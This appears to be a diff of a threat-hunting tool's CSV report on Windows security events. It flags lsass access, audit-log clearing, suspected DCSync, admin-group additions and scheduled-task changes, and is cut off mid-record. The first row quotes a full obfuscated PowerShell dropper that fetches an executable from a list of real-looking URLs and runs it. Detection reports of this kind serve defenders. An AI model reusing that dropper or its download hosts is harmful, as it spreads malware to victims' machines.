+ PipelineId=6
+ ScriptName=
+ CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item"
+ParameterBinding(New-Item): name="ItemType"; value="DIrectOry"
+ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\"
+
+
+
+",DESKTOP-RIPCLIP,Windows PowerShell
+non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+",MSEDGEWIN10,Security
+non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656,"
+
+
+
+
+ 4656
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314461
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ 00000000-0000-0000-0000-000000000000
+ %%1537
+ %%1538
+ %%1539
+ %%1540
+ %%1541
+ %%4480
+ %%4481
+ %%4482
+ %%4483
+ %%4484
+ %%4485
+ %%4486
+ %%4487
+ %%4488
+ %%4489
+ %%4490
+ %%4491
+ %%4492
+ %%4493
+
+ -
+ 0x1f3fff
+ -
+ 0
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+",MSEDGEWIN10,Security
+Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 4987
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+
+
+",IEWIN7,Security
+Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 768617
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x4c331
+
+
+",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"
+
+
+
+
+ 4662
+ 0
+ 0
+ 14080
+ 0
+ 0x8020000000000000
+
+
+ 202793
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-500
+ Administrator
+ insecurebank
+ 0x40c6511
+ DS
+ %{19195a5b-6da0-11d0-afd3-00c04fd930c9}
+ %{c6faf700-bfe4-452a-a766-424f84c29583}
+ Object Access
+ 0x0
+ %%7688
+
+ 0x100
+ %%7688
+ {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
+ {19195a5b-6da0-11d0-afd3-00c04fd930c9}
+
+ -
+
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"
+
+
+
+
+ 4662
+ 0
+ 0
+ 14080
+ 0
+ 0x8020000000000000
+
+
+ 202792
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-500
+ Administrator
+ insecurebank
+ 0x40c6511
+ DS
+ %{19195a5b-6da0-11d0-afd3-00c04fd930c9}
+ %{c6faf700-bfe4-452a-a766-424f84c29583}
+ Object Access
+ 0x0
+ %%7688
+
+ 0x100
+ %%7688
+ {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
+ {19195a5b-6da0-11d0-afd3-00c04fd930c9}
+
+ -
+
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 769792
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x4c331
+
+
+",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"
+
+
+
+
+ 4662
+ 0
+ 0
+ 14080
+ 0
+ 0x8020000000000000
+
+
+ 202791
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-500
+ Administrator
+ insecurebank
+ 0x40c6511
+ DS
+ %{19195a5b-6da0-11d0-afd3-00c04fd930c9}
+ %{c6faf700-bfe4-452a-a766-424f84c29583}
+ Object Access
+ 0x0
+ %%7688
+
+ 0x100
+ %%7688
+ {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
+ {19195a5b-6da0-11d0-afd3-00c04fd930c9}
+
+ -
+
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 887106
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x3a17a
+
+
+",01566s-win16-ir.threebeesco.com,Security
+Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+",MSEDGEWIN10,Security
+schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702,"
+
+
+
+
+ 4702
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 198239223
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-20
+ DC1$
+ insecurebank
+ 0x3e4
+ \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
+ <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
+ <Version>1.0</Version>
+ <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
+ <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
+ <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
+ </RegistrationInfo>
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2019-03-26T12:51:45Z</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="NetworkService">
+ <UserId>S-1-5-20</UserId>
+ <RunLevel>LeastPrivilege</RunLevel>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>false</AllowHardTerminate>
+ <StartWhenAvailable>true</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
+ <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ <RestartOnFailure>
+ <Interval>PT1M</Interval>
+ <Count>3</Count>
+ </RestartOnFailure>
+ </Settings>
+ <Actions Context="NetworkService">
+ <ComHandler>
+ <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
+ <Data><![CDATA[timer]]></Data>
+ </ComHandler>
+ </Actions>
+</Task>
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 2988521
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1105
+ jbrown
+ 3B
+ 0x1717b6
+
+
+",01566s-win16-ir.threebeesco.com,Security
+User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"
+
+
+
+
+ 4720
+ 0
+ 0
+ 13824
+ 0
+ 0x8020000000000000
+
+
+ 769634
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ $
+ 3B
+ S-1-5-21-308926384-506822093-3341789130-107104
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ -
+ $
+ %%1793
+ -
+ %%1793
+ %%1793
+ %%1793
+ %%1793
+ %%1793
+ %%1794
+ %%1794
+ 513
+ -
+ 0x0
+ 0x15
+
+ %%2080
+ %%2082
+ %%2084
+ %%1792
+ -
+ %%1793
+
+",01566s-win16-ir.threebeesco.com,Security
+User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"
+
+
+
+
+ 4720
+ 0
+ 0
+ 13824
+ 0
+ 0x8020000000000000
+
+
+ 769629
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ $
+ 3B
+ S-1-5-21-308926384-506822093-3341789130-107103
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ -
+ $
+ %%1793
+ -
+ %%1793
+ %%1793
+ %%1793
+ %%1793
+ %%1793
+ %%1794
+ %%1794
+ 513
+ -
+ 0x0
+ 0x15
+
+ %%2080
+ %%2082
+ %%2084
+ %%1792
+ -
+ %%1793
+
+",01566s-win16-ir.threebeesco.com,Security
+schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702,"
+
+
+
+
+ 4702
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 198238969
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-20
+ DC1$
+ insecurebank
+ 0x3e4
+ \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
+ <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
+ <Version>1.0</Version>
+ <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
+ <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
+ <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
+ </RegistrationInfo>
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2019-03-26T12:21:45Z</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="NetworkService">
+ <UserId>S-1-5-20</UserId>
+ <RunLevel>LeastPrivilege</RunLevel>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>false</AllowHardTerminate>
+ <StartWhenAvailable>true</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
+ <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ <RestartOnFailure>
+ <Interval>PT1M</Interval>
+ <Count>3</Count>
+ </RestartOnFailure>
+ </Settings>
+ <Actions Context="NetworkService">
+ <ComHandler>
+ <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
+ <Data><![CDATA[timer]]></Data>
+ </ComHandler>
+ </Actions>
+</Task>
+
+",DC1.insecurebank.local,Security
+schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702,"
+
+
+
+
+ 4702
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 198238774
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-20
+ DC1$
+ insecurebank
+ 0x3e4
+ \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
+ <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
+ <Version>1.0</Version>
+ <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
+ <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
+ <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
+ </RegistrationInfo>
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2019-03-26T11:51:45Z</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="NetworkService">
+ <UserId>S-1-5-20</UserId>
+ <RunLevel>LeastPrivilege</RunLevel>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>false</AllowHardTerminate>
+ <StartWhenAvailable>true</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
+ <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ <RestartOnFailure>
+ <Interval>PT1M</Interval>
+ <Count>3</Count>
+ </RestartOnFailure>
+ </Settings>
+ <Actions Context="NetworkService">
+ <ComHandler>
+ <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
+ <Data><![CDATA[timer]]></Data>
+ </ComHandler>
+ </Actions>
+</Task>
+
+",DC1.insecurebank.local,Security
+schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702,"
+
+
+
+
+ 4702
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 198238563
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-20
+ DC1$
+ insecurebank
+ 0x3e4
+ \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
+ <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
+ <Version>1.0</Version>
+ <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
+ <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
+ <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
+ </RegistrationInfo>
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2019-03-26T11:21:44Z</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="NetworkService">
+ <UserId>S-1-5-20</UserId>
+ <RunLevel>LeastPrivilege</RunLevel>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>false</AllowHardTerminate>
+ <StartWhenAvailable>true</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
+ <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ <RestartOnFailure>
+ <Interval>PT1M</Interval>
+ <Count>3</Count>
+ </RestartOnFailure>
+ </Settings>
+ <Actions Context="NetworkService">
+ <ComHandler>
+ <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
+ <Data><![CDATA[timer]]></Data>
+ </ComHandler>
+ </Actions>
+</Task>
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 772605
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x7b186
+
+
+",01566s-win16-ir.threebeesco.com,Security
+User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732,"
+
+
+
+
+ 4732
+ 0
+ 0
+ 13826
+ 0
+ 0x8020000000000000
+
+
+ 191030
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ -
+ S-1-5-20
+ Administrators
+ Builtin
+ S-1-5-32-544
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x27a10f
+ -
+
+",MSEDGEWIN10,Security
+User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732,"
+
+
+
+
+ 4732
+ 0
+ 0
+ 13826
+ 0
+ 0x8020000000000000
+
+
+ 191029
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ -
+ S-1-5-21-3461203602-4096304019-2269080069-501
+ Administrators
+ Builtin
+ S-1-5-32-544
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x27a10f
+ -
+
+",MSEDGEWIN10,Security
+Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"
+
+
+
+
+ 4662
+ 0
+ 0
+ 14080
+ 0
+ 0x8020000000000000
+
+
+ 203056
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-500
+ Administrator
+ insecurebank
+ 0x418a6fb
+ DS
+ %{19195a5b-6da0-11d0-afd3-00c04fd930c9}
+ %{c6faf700-bfe4-452a-a766-424f84c29583}
+ Object Access
+ 0x0
+ %%7688
+
+ 0x100
+ %%7688
+ {9923a32a-3607-11d2-b9be-0000f87a36b2}
+ {19195a5b-6da0-11d0-afd3-00c04fd930c9}
+
+ -
+
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 203050
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-500
+ administrator
+ insecurebank
+ 0x218b896
+
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242594
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ AF3067E0-BB6F-47C2-AA20-F3F458797F38
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609